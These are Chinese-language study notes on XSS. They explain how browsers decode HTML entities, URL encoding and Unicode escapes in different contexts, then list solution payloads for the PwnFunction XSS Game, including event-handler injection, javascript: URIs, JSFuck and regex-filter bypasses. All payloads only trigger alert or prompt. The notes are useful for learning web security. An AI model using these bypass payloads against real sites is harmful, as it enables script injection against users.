html
N1.<a href="%6a%61%76%61%73%63%72%69%70%74:%61%6c%65%72%74%28%31%29">1</a>
URL 编码 "javascript:alert(1)"
#<a>标签无法对urlcode编码进行解码,无法识别JavaScript:
Y2.<a href="javascript:%61%6c%65%72%74%28%32%29">2</a>
HTML字符实体编码 "javascript" 和 URL 编码 "alert(2)"
#href中为URL,URL模块可识别javascript:协议,并且对alert(2)进行URL解码
N3.<a href="javascript%3aalert(3)">3</a>
URL 编码 ":"
#<a>标签无法对urlcode编码进行解码,无法完整的识别JavaScript:协议
N4.<div><img src=x onerror=alert(4)></div>
HTML字符实体编码 < 和 >
#在读取<div>之后进入数据状态,<会被HTML解码,但不会进入标签开始状态,当然也就不会创建img元素。
N5.<textarea><script>alert(5)</script></textarea>
HTML字符实体编码 < 和 >
#<textarea>是RCDATA元素,可以容纳文本和字符引用,不能容纳其他元素。
N6.<textarea><script>alert(6)</script></textarea>
#<textarea>是RCDATA元素,可以容纳文本和字符引用,不能容纳其他元素。
Y7.<button onclick="confirm('7');">Button</button>
HTML字符实体编码 " ' " (单引号)
N8.<button onclick="confirm('8\u0027);">Button</button>
Unicode编码 " ' " (单引号)
#onclick中的值会交给JS处理,在JS中只有字符串和标识符能用Unicode表示,`'`显然不行,JS执行失败。
N9.<script>alert(9);</script>
HTML字符实体编码 alert(9);
#script属于原始文本元素只可以容纳文本,于是直接由JS处理,JS也认不出来,执行失败。
Y10.<script>\u0061\u006c\u0065\u0072\u0074(10);</script>
Unicode 编码 alert
#script属于原始文本元素只可以容纳文本,于是直接由JS处理,JS可以解析Unicode的编码。
N11.<script>\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0031\u0029</script>
Unicode 编码 alert(11)
#JS中只有字符串和标识符能用Unicode表示。
N12.<script>\u0061\u006c\u0065\u0072\u0074(\u0031\u0032)</script>
Unicode 编码 alert 和 12
#\u0031\u0032在解码的时候会被解码为字符串`12`,注意是字符串,不是数字,文字显然是需要引号的,JS执行失败。
N13.<script>alert('13\u0027)</script>
Unicode 编码 " ' " (单引号)
#script属于原始文本元素只可以容纳文本,于是直接由JS处理,JS可以解析Unicode的编码。
Y14.<script>alert('14\u000a')</script>
Unicode 编码换行符(0x0A)
Y15.<a href="javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c%75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34(15)">15</a>
#html->url->unicode* 空元素,不能容纳任何内容(因为它们没有闭合标签,没有内容能够放在开始标签和闭合标签中间)。
* 原始文本元素,可以容纳文本。
* RCDATA元素,可以容纳文本和字符引用。
* 外部元素,可以容纳文本、字符引用、CDATA段、其他元素和注释
* 基本元素,可以容纳文本、字符引用、其他元素和注释
XSS Game - Learning XSS Made Simple! | Created by PwnFunction
#innerText 是 JavaScript 中的一个 DOM(文档对象模型)属性,表示 HTML 元素的可见文本内容。它包含元素及其子元素中的所有文本,同时排除任何标记或隐藏文本。<script>中不包含可见文本。
somebody=<img src=1 οnerrοr="alert(1337)">
?jeff=aaa";alert(1337);"
?jeff=aaa"-alert(1337);-"
#在js中-两边都是表达式,则可以执行代码
?wey=aaa" οnfοcus="alert(1337)" autofocus="true
?ricardo=javascript:alert(1337)
?markassbrownlee=<img src=1 οnerrοr=location="javascript:alert%25281337%2529">
?markassbrownlee=<img src=1 οnerrοr="javascript:alert%26%2340%3B1337%26%2341">
#%26%2340%3B1%26%2341解码成(1)
alert(1337)=[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[+!+[]+[!+[]+!+[]+!+[]]]+[+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+([+[]]+![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[!+[]+!+[]+[+[]]])
#因为在 URL 中字符 + 和 %20 都代表空格。如果需要在 URL 中使用实际的 + 字符,而不是表示空格,必须对其进行编码。
?mafia=Function(/ALERT(1337)/.source.toLowerCase())()
?mafia=eval(8680439..toString(30))(1337)
#8680439是alert的30进制。这里将8680439又转成字符串来绕过正则。
?mafia=eval(location.hash.slice(1))#alert(1337)
"#"号后面的值并没有传给mafia
#payload:prompt(1337);
#payload:confirm(1337);
